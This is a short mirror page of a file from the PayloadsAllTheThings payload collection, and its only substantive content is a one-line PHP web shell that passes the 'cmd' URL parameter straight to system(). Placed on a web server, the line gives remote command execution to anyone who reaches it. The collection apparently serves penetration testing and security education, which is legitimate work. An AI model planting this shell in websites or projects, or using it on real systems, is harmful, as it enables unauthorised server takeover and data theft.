mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
1 line
43 B
Text
1 line
43 B
Text
|
<?php echo "Shell";system($_GET['cmd']); ?>
|